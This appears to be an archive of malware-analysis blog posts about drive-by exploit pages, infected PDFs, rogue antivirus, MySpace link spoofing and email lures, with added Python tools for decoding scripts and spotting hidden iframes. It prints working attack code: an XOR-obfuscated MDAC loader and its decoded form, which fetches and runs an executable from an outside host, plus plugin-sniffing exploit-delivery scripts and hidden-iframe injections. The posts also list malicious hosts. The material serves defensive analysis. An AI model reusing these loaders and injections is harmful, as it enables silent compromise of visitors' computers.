Archive for the 'Vulnerabilities' Category

13 Oct

Internet Exploitation Adventure

This post shows the lengths people will go to in order to install malware onto computers. We will show how visiting one website takes you on a journey through many websites that check your computer for vulnerable software and, if any is found, install malware on it.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org starts the process. Hidden iframes then load websites that scan your computer for vulnerabilities and, if they find nothing to exploit, redirect you somewhere else. These websites are still active, so proceed at your own risk.

The links on this page DO NOT link to the infected websites. They are anchor links further down the page, to make the analysis easier to view. The links just below are listed in the approximate order in which they would load while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

The picture below shows a visual map of how the pages are loaded.


05 Oct

Multiple Exploit Page (Acrobat, Outlook Express, & Quicktime)-VIDEO

Here is another example of an exploit page. This exploit searches for a vulnerability and then injects the malware onto the computer. In this case there are multiple files in use; all of them are listed below with details. As with previous posts, we captured video of the exploit in action. The files are available in our repository under /pnuemo-malware/1005-exploit.zip.

The first page starts the search for a vulnerability to exploit and, once one is found, loads the binary from the next URL. It looks for vulnerabilities in Adobe Acrobat, Outlook Express, and QuickTime, to name a few. The exploit page has multiple pages of obfuscated code, too much to post here. You can download the code here (.txt).

BE ADVISED: These websites may still be live. Proceed at your own risk.

hxxp://195.242.161.63/z/index.php -> hxxp://195.242.161.63/z/load.php?ssv=

doc.pdf
Result: 8/36 (22.23%)
MD5: 2b477c02cef58a4d965b149311f495f2
VirusTotal

default.exe
Result: 14/36 (38.89%)
MD5: df5fbc8fb5ab1e9a69c72508250cb451
VirusTotal
ThreatExpert Analysis

Download Video (.wmv)

04 Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different from the one posted earlier: it redirects through multiple pages, logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the installed binary is almost entirely undetected except for a few heuristic catches. Look below for more information about this exploit and about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites may be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This page contains a simple hidden iframe that loads multiple pages, each logging the visitor.

<iframe src="http://megsrdomain.cn/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>

Inside the iframe we are redirected twice before reaching the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. This page contains many, many pages of code and there is too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

04 Oct

MDAC Exploit Page (iexplorer.exe)

We discovered another exploit page that injects malware onto the user's computer by way of a vulnerability in MDAC. The initial page is loaded with obfuscated code. When deobfuscated, it exploits Adobe and then opens the loader page, from which the malware payload is injected. Below is an analysis of the exploit page along with the malware information. The binary has very few real detections; most are just heuristics. This file is available in the repository under /pnuemo-malware/.

BE ADVISED: Websites may still be active, proceed at your own risk.

hxxp://gavai-pegc9.ws/Gpack/index.php

<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(: gtobuhno!ru`su)(!z w`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(: {`e/rdu@uushctud)&he&-&{`e&(: {`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(: usx!z w`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(: w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(: w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(: usx!z!u/uxqd!<!0: p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(: p/rdoe)(:!u/nqdo)(: u/Vshud)p/sdrqnordCnex(: w`s!o`ld!<!&/..//..hdyqmnsds/dyd&: u/R`wdUnGhmd)o`ld-3(: u/Bmnrd)(: |!b`ubi)d(!z| usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z|| b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html>

deobfuscates to:

start();
function start() {
var zad = document.createElement('object');
zad.setAttribute('id','zad');
zad.setAttribute('classid','cl'+'si'+"d:BD"+"96C5"+'56-65A3-1'+"1D0-98"+'3A-00'+"C04"+'FC2'+"9E"+'36');
try {
var q = zad.CreateObject('ms'+"xm"+'l2'+"."+'XM'+"LH"+'T'+'TP','');
var s = zad.CreateObject("Shel"+"l.Ap"+"pl"+"icati"+"on",'');
var t = zad.CreateObject('ad'+'od'+"b."+'st'+"re"+'am','');
try { t.type = 1;
q.open('G'+"E"+'T','http://gavai-pegc9.ws/Gpack/load.php',false);
q.send(); t.open();
t.Write(q.responseBody);
var name = './/..//iexplorer.exe';
t.SaveToFile(name,2);
t.Close();
} catch(e) {}
try { s.shellexecute(name); } catch(e) {}}
catch(e){}}

hxxp://gavai-pegc9.ws/Gpack/load.php downloads the malware binary.
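The loader above only has to be read, not run, to give up its indicators: the real script sits in one string literal whose characters are XORed with 1 and rebuilt with String.fromCharCode before eval(). The following Python is an added example, not code from the original post. It finds the XOR key and the payload literal statically, decodes it, re-joins the chopped-up literals ('ms'+"xm"+'l2'...) and extracts the URLs, ActiveX CLSID, COM ProgIDs and dropped file names a responder would want. SAMPLE_LOADER is constructed here to mirror the page's loader (the host loader.invalid is a placeholder; the CLSID is the one shown on the page); all function names are this example's own.

```python
"""Recover an XOR-encoded loader script without executing it (added example)."""
import re

# Any single- or double-quoted JS string literal.
_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
# The key N in "String.fromCharCode(str.charCodeAt(i) ^ N)".
_XOR_KEY = re.compile(r"charCodeAt\s*\([^)]*\)\s*\^\s*(\d+)")
# Two adjacent literals glued together with '+'.
_CONCAT = re.compile(r"""(['"])([^'"\\]*)\1\s*\+\s*(['"])([^'"\\]*)\3""")


def xor_decode(encoded, key):
    """Undo String.fromCharCode(c ^ key) for every character (XOR is its own inverse)."""
    return "".join(chr(ord(c) ^ key) for c in encoded)


def find_xor_key(script):
    """Return N from the decoder loop, or None if the page uses another scheme."""
    m = _XOR_KEY.search(script)
    return int(m.group(1)) if m else None


def longest_literal(script):
    """The payload is the longest quoted string in the loader."""
    best = ""
    for m in _LITERAL.finditer(script):
        text = m.group(1) if m.group(1) is not None else m.group(2)
        if len(text) > len(best):
            best = text
    return best


def join_literals(js):
    """Collapse 'a'+"b"+'c' into 'abc' so split-up strings become searchable."""
    previous = None
    while previous != js:
        previous = js
        js = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", js)
    return js


def deobfuscate(script):
    """Plaintext of the eval()ed script, with string literals re-joined."""
    key = find_xor_key(script)
    if key is None:
        raise ValueError("no charCodeAt(...) ^ N decoder loop found")
    return join_literals(xor_decode(longest_literal(script), key))


_IOC = {
    "url": re.compile(r"https?://[^\s'\"<>)]+"),
    "clsid": re.compile(r"clsid:([0-9A-Fa-f-]{36})"),
    "progid": re.compile(r"CreateObject\(\s*'([^']+)'"),
    "file": re.compile(r"[\w./\\-]+\.(?:exe|dll|pdf|scr)\b", re.I),
}


def extract_iocs(plaintext):
    """Sorted, de-duplicated indicators per category."""
    return {name: sorted(set(rx.findall(plaintext))) for name, rx in _IOC.items()}


# Constructed sample: the same shape as the page's loader, built by XORing a
# short plaintext with 1 (encoding and decoding are the same operation).
_PLAIN = (
    "var zad = document.createElement('object');\n"
    "zad.setAttribute('classid','cl'+'si'+\"d:BD\"+\"96C5\"+'56-65A3-1'"
    "+\"1D0-98\"+'3A-00'+\"C04\"+'FC2'+\"9E\"+'36');\n"
    "var q = zad.CreateObject('ms'+\"xm\"+'l2'+\".\"+'XM'+\"LH\"+'T'+'TP','');\n"
    "var t = zad.CreateObject('ad'+'od'+\"b.\"+'st'+\"re\"+'am','');\n"
    "q.open('G'+\"E\"+'T','http://loader.invalid/load.php',false);\n"
    "var name = './/..//iexplorer.exe';\n"
)
SAMPLE_LOADER = (
    'str = "' + xor_decode(_PLAIN, 1) + '";str2 = "";'
    "for (i = 0; i < str.length; i ++) { str2 = str2 + "
    "String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);"
)

if __name__ == "__main__":
    plain = deobfuscate(SAMPLE_LOADER)
    print(plain)
    for kind, values in extract_iocs(plain).items():
        print(f"{kind}: {values}")
```

Re-joining the literals matters more than the XOR step: the split-up 'cl'+'si'+"d:BD"... is there precisely so that a grep for the RDS.DataSpace CLSID or for "adodb.stream" finds nothing in the raw page.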

file.exe
Result: 9/36 (25%)
MD5: e427f1c2438259b5b4bb386aec822e30
VirusTotal
ThreatExpert Sandbox Analysis

31 Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

when deobfuscated…

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+'.'+res[2]+'.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,"");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;
if(ppdfenable)
{
document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
}
}
</script>

This leads us to the pdf in question, located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information about the file. It is also available in /pnuemo-malware/.
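Every stage in this post and in the accwizm.exe post above is delivered the same way: a 1x1 or visibility:hidden iframe, placed directly in the markup, assembled by document.write(unescape(...)), or written by document.write('<iframe ...>') after the plugin check. The scanner below is an added example, not code from the original posts. It recovers those document.write arguments statically (nothing is executed or fetched), parses every iframe and reports the ones styled to be invisible. SAMPLE_PAGE is constructed to mirror the posts, and its .invalid hosts are placeholders.

```python
"""Find hidden iframes in a captured page, including ones written at run time (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote

# document.write(unescape('%3C...')) and document.write('<iframe ...>')
_UNESCAPE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
_DOC_WRITE = re.compile(r"""document\.write\(\s*(['"])(.*?)\1\s*\)""", re.S)


def generated_fragments(html):
    """Markup the page would write at run time, recovered without running it."""
    fragments = [unquote(m.group(2)) for m in _UNESCAPE.finditer(html)]
    fragments += [m.group(2) for m in _DOC_WRITE.finditer(html)]
    return fragments


class _IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _size(value):
    digits = re.sub(r"\D", "", value)
    return int(digits) if digits else None


def hiding_reasons(attrs):
    """Why this iframe would be invisible to the visitor (empty list if it would not)."""
    reasons = []
    width, height = _size(attrs.get("width", "")), _size(attrs.get("height", ""))
    if width is not None and height is not None and width <= 1 and height <= 1:
        reasons.append("1x1 frame")
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    if "visibility:hidden" in style:
        reasons.append("visibility:hidden")
    if "display:none" in style:
        reasons.append("display:none")
    if re.search(r"(?:left|top):-\d", style):
        reasons.append("positioned off-screen")
    return reasons


def find_hidden_iframes(html):
    """Every hidden iframe in the static markup and in document.write output."""
    hits = []
    for fragment in [html] + generated_fragments(html):
        collector = _IframeCollector()
        collector.feed(fragment)
        collector.close()
        for attrs in collector.iframes:
            reasons = hiding_reasons(attrs)
            if reasons:
                hits.append({"src": attrs.get("src", ""), "reasons": reasons})
    return hits


# Constructed sample page: one visible frame and three hidden delivery frames.
_HIDDEN_FRAME = ('<iframe src="http://second-hop.invalid/index.php" width=1 height=1 '
                 'style="visibility:hidden;position:absolute"></iframe>')
_ENCODED_FRAME = quote(_HIDDEN_FRAME, safe="")   # the %3C%69%66... form used on the page
SAMPLE_PAGE = f"""<html><body>
<p>Ordinary content the visitor actually sees.</p>
<iframe src="http://video.invalid/embed/42" width=640 height=360></iframe>
<iframe src="http://counter.invalid/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>
<script language="javascript">document.write(unescape('{_ENCODED_FRAME}'));</script>
<script>if(ppdfenable){{document.write('<iframe width=1 height=1 src="http://pdfhost.invalid/gnu.pdf"></iframe>');}}</script>
</body></html>"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

The HTML parser deliberately ignores tags inside script elements, which is why the document.write arguments are decoded and fed to it as separate fragments; without that step the unescape-built iframe and the gnu.pdf iframe are invisible to a static scan.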

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

26 Jul

The new wave of malware being sent by email, botnet for hire?

My friend Lithium has been blogging about the recent wave of malware being distributed by email. There seem to be two distinct campaigns right now:

1- Emails that have links to compromised web sites (no attachments)

2- Emails that have a .zip/exe attachment

As I was working on some of our customers' computers (they got infected when clicking an email from UPS, even though they had never shipped anything...) I realized how bad this actually is. People think they are being infected by the rogue antivirus programs (Antivirus XP, Antivirus 2009, 2009 Antivirus, AAV... whatever they decide to promote), but the origin of the infection itself is much worse than that:

The file received in the email is actually a variant of ZTOP or Sinowal (the name changes depending on the AV vendor). These trojans have self-update, key-logging and remote-control capabilities. Once installed, they "phone home" to download updated commands, and they do this periodically.

I ran one of them on one of my virtual machines. For a few seconds nothing happened, and I was even tempted to run it again. Then the trojan connected to Russia (hxxp://blatundalqik.ru/panama/odessa.bin) and downloaded new instructions. Immediately, my virtual machine began closing applications, and before it restarted on its own the desktop background changed to the popular "your computer is infected".

Once the computer restarted, I had one of the variants of XP Antivirus running and my real antivirus was just dead. Constant warnings were coming from the task bar. I have seen these warnings hundreds of times. They are annoying, but usually they are not dangerous. This time is different.

What actually happened is that the trojan had installed itself (ntos.exe, crypts.dll, the wnspoem folder and the video/audio.dll files) and, after calling home, it was ordered to install XP Antivirus. They ordered it to install XP Antivirus the same way they could have ordered it to silently monitor the user's browsing and capture any bank or credit card information. Tomorrow they may decide that they need spamming computers, or to DoS a company... all they have to do is change the configuration file. All the infected zombies will follow orders!

Once ntos.exe and crypts.dll are installed on a computer, the computer no longer belongs to the user. Using rootkit techniques, the file hides itself from the user, and only advanced rootkit detectors will be able to reveal the real problem. The trojan also runs from a temporary file in the temp folder, while crypts.dll monitors that the registry entries required to load it on restart are still present. The computer is now part of a botnet, another zombie to be used as needed.

And the XP Antivirus infection? It's annoying, and you may have to fix a few registry entries to regain full desktop functionality, but unless you go and buy their product they are more or less harmless (at least from a technical point of view; I'm sure the user will see it as worse than having a silent trojan).

Only the people controlling the hxxp://blatundalqik.ru server will know the actual extent of the infection. Besides the pop-ups and attempts to get your credit card information, the trojan could be recording your every keystroke, logging your visits to pay your bills, even taking screenshots of your applications; while all your confidential information is conveniently backed up on a server in Russia, should it ever be needed by someone (other than you).

The flood of XP Antivirus and similar calls to the antivirus companies also has the effect of saturating their resources: they have to dedicate more and more time to manual removal of infections to keep the customer happy, while the real malicious code lurks in the background, undetected.

 

26 Jul

More malicious search engine results…

This was quite interesting. One of my co-workers just learned that there is a malicious HTML page with his name on it! When I downloaded the page we realized that it was not a targeted attack, but a different variant of the malicious pages I reported in my MSN malicious results post.

This server actually had 3179 other HTML pages, each with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages.

The script looks like the one reported before:

function zrwe(yry,dtj){if(!dtj){dtj='SDedpf
E96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0';}var y;var OR='';for(var vadz=0;vadz<yry.length;vadz+=4){y=(dtj.indexOf(yry.charAt(vadz))&63)<<18|(dtj.indexOf(yry.charAt(vadz+1))&63)<<12|(dtj.indexOf(yry.charAt(vadz+2))&63)<<6|dtj.indexOf(yry.charAt(vadz+3))&63;OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe('2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS');

And it translates into:

window.location=encodeURI("hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX");
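The zrwe() function above is a base64 decoder with a shuffled alphabet: each group of four characters is looked up in the key string, packed into 24 bits, split into three bytes, and the last three bytes of the result are dropped before eval(). Re-implementing it in Python, as an added example that is not code from the original post, lets a responder read the redirect target without running the script. DEFAULT_KEY and ENCODED_SAMPLE are the key and argument quoted above; the Python function names are this example's own.

```python
"""Decode the page's custom base64 redirect script without executing it (added example)."""
import re

# The default alphabet from zrwe(); position in this string is the 6-bit value.
DEFAULT_KEY = "SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0"

# The argument passed to zrwe() on the page.
ENCODED_SAMPLE = (
    "2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*8"
    "2hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAH"
    "hmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}"
    "-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS"
)


def custom_b64_decode(data, key=DEFAULT_KEY):
    """Mirror of the JS loop: four alphabet positions -> 24 bits -> three characters.

    JS indexOf() returns -1 for a character missing from the key and 0 for the
    empty string that charAt() yields past the end, so both are reproduced here.
    """
    def pos(i):
        return key.find(data[i]) if i < len(data) else 0

    out = []
    for i in range(0, len(data), 4):
        y = (((pos(i) & 63) << 18) | ((pos(i + 1) & 63) << 12)
             | ((pos(i + 2) & 63) << 6) | (pos(i + 3) & 63))
        out.append(chr((y >> 16) & 255) + chr((y >> 8) & 255) + chr(y & 255))
    return "".join(out)


def zrwe_decode(data, key=DEFAULT_KEY):
    """What the page's zrwe() hands to eval(): the decoded text minus three padding bytes."""
    return custom_b64_decode(data, key)[:-3]


def redirect_targets(script):
    """URLs mentioned in the decoded script, i.e. where the visitor is sent."""
    return re.findall(r"https?://[^\s\"']+", script)


if __name__ == "__main__":
    decoded = zrwe_decode(ENCODED_SAMPLE)
    print(decoded)
    print("redirects to:", redirect_targets(decoded))
```

Because the alphabet is just a parameter, the same decoder handles the per-site key variants mentioned in the MSN post below: read the key out of the page's own zrwe() definition and pass it as key.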

The redirection has changed to a different server:

hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=

Right now this is directing you to antivirus2008scanner.com, one of the multiple variants of rogue antivirus on the market. scan.wspscanner.com is another possible destination.

How difficult is it to get to one of those pages?


24 Jul

MySpace infected pages distributing ZLOB

During the last few weeks I have seen a few infected MySpace pages: pages from regular users that get "corrupted" by malicious visitors. The attacker inserts an iframe into one of the posts on the page, turning most of the page into a huge hyperlink to a malicious site.

This is an example of the code that gets inserted:

<.a ggg= </ggg href="<hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk>" style="position:absolute; top:0px;background-repeat:no-repeat;left:0px; height:860px;width:1263px;background-image:url( <http://x.myspace.com/images/clear.gif);> background-position:left;">

Take a closer look at the link itself:

hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk

It looks just like any other MySpace link, but pay closer attention: there are no "/" characters! There should have been one after myspace.com and before index.cfm. Without the slash, the real domain of the page is 16658764.tk, far different from what they want the user to believe it is. A regular user will not notice the difference and, if he clicks on the hot area of the page, will end up landing here:

hxxp://myspacelogin-error900.freehostia.com/myspace.php
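The trick works because a browser treats everything between the scheme and the first "/" as the hostname, so a link with no slashes at all is served by its last labels (16658764.tk), not by the brand name that appears first. The following Python is an added example, not code from the original post: host_of() splits a URL the way a browser does, registrable_domain() keeps the last two labels (an assumption that ignores multi-label public suffixes such as co.uk), and impersonates() flags a brand domain that appears inside the host but is not the domain actually being visited. INJECTED_LINK is the link quoted in the post; GENUINE_LINK is a constructed counterpart with the slashes in place.

```python
"""Tell a look-alike host apart from the real site (added example)."""
import re


def host_of(url):
    """Hostname as a browser resolves it: after '://', before the first / ? or #."""
    rest = url.split("://", 1)[1] if "://" in url else url
    netloc = re.split(r"[/?#]", rest, maxsplit=1)[0]
    # Drop any user@ prefix and :port suffix, then normalise case.
    return netloc.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def registrable_domain(host):
    """Last two labels of the host (assumption: no multi-label public suffix)."""
    labels = host.strip(".").split(".")
    return ".".join(labels[-2:])


def impersonates(url, brand_domain):
    """True when the brand's domain appears inside the host but is not what is visited."""
    host = host_of(url)
    return brand_domain in host and registrable_domain(host) != brand_domain


def scan_links(urls, brand_domains):
    """(url, real_domain, brand) for every link that borrows a brand name it does not own."""
    findings = []
    for url in urls:
        for brand in brand_domains:
            if impersonates(url, brand):
                findings.append((url, registrable_domain(host_of(url)), brand))
    return findings


# The injected link from the post (defanged scheme kept) and a constructed genuine one.
INJECTED_LINK = "hxxp://profile.myspace.com.index.cfm.fuseaction=user.viewprofile&friendid=.16658764.tk"
GENUINE_LINK = "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=16658764"

if __name__ == "__main__":
    for url, real, brand in scan_links([INJECTED_LINK, GENUINE_LINK], ["myspace.com"]):
        print(f"{url}\n  looks like {brand} but is served by {real}")
```

Run over a dump of links harvested from user posts, scan_links() reports only the injected one: the genuine profile URL contains the brand too, but there it is the registrable domain.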

The MySpace user will most likely install the "new MySpace object browser", but will instead be agreeing to install a new variant of ZLOB. This means lots of pop-ups and constant warnings about the computer being infected (hey, but give us your money and we'll clean it for you with our super-duper antivirus)...

There is no good way of getting out of that page: either you accept the download, or you must kill your Internet Explorer. If you select cancel you'll be put in a "cancel, are you sure, ok, cancel" loop. Just use Task Manager and kill the browser.

We have downloaded THOUSANDS of samples of ZLOB from that location, each one slightly different to make life more difficult for the AV vendors.

Be careful. Always double check your links and do not accept any “free updates” from suspicious sites.

22 Jul

Malware disguised among MSN search results…

Hi there, this is my first post on the blog and I'll be blogging about malware pages disguised as good results on the MSN Live Search engine. Over the past weeks I have detected close to one thousand infected servers, each of them hosting over 2000 bad HTML pages, currently being returned to users via MSN.

This is the way the infection happens: a user performs a search on MSN Live Search and, depending on his luck, some malicious web sites are returned. The brief description displayed on the search results page may indicate that the contents of the website could be a good match for what the user is looking for, but he will never see that page once the link is clicked...

On those malicious pages there is some more or less random text (the text can be somewhat targeted at certain keywords, or just stolen from real websites), but at the top of the page an encrypted script automatically redirects the user through a server in Russia that, on the first visit, asks the user to install a video codec to view a video of what he was looking for.

I have identified over 1000 web sites, each with close to 3000 HTML pages. The variables in the script and the "keys" to decrypt it vary between sites, making detection harder. If you visit one of those sites directly (with no Referer) the site responds with an apparent "404 - Not Found" message... but looking at the source code of the page you can easily see the full real page and script. This is a trick to make detection even harder, as it's very easy to think that the page is actually down.

Do you want to see some of them?


18 Jul

Afghan bombing kills President Bush (watch.exe)

The Washington Post reported today that President Bush has hit another all-time low (69%) according to a recent poll [link].

Q. Do you approve or disapprove of the way George W. Bush is handling his job as president?

A. 28% approve; 69% disapprove

SOURCE: Washington Post-ABC News poll conducted by telephone July 10-13, 2008 among a random national sample of 1,119 adults. Results have a three point error margin.

Bush Approval Rating Poll

With that said, we stumbled across an e-mail today with the subject line "Afghan Bombing kills President Bush." Time after time we see social engineering used to entice unsuspecting users into infecting themselves, and the subject line of this e-mail is proof of that.

Here is what the e-mail looks like. The body doesn't really make much sense, but I'm sure many will just read the subject line and click on the link despite this.

When we visit the site we see a copy of the YouTube SWF player and a prompt to download a file called watch.exe to see it.

If we download watch.exe and open it we see it exploiting vulnerable versions of Java.

MD5: efbd6daf5a73fa6398538f1eec1f48a2
The file has been made available to members of Malware Database.

More information about what watch.exe does can be obtained here [result.zip], thanks to Joe Security!

Upon further investigation we found a massive wave of these going out today.

Take a look at some of the other e-mail titles we have seen:

Edit: New e-mail subject as of today.  “Conspiracy of 1865 Lincoln assassination exposed”


Update here: http://malwaredatabase.net/blog/index.php/2008/07/20/the-plot-thickens-watch-exe/



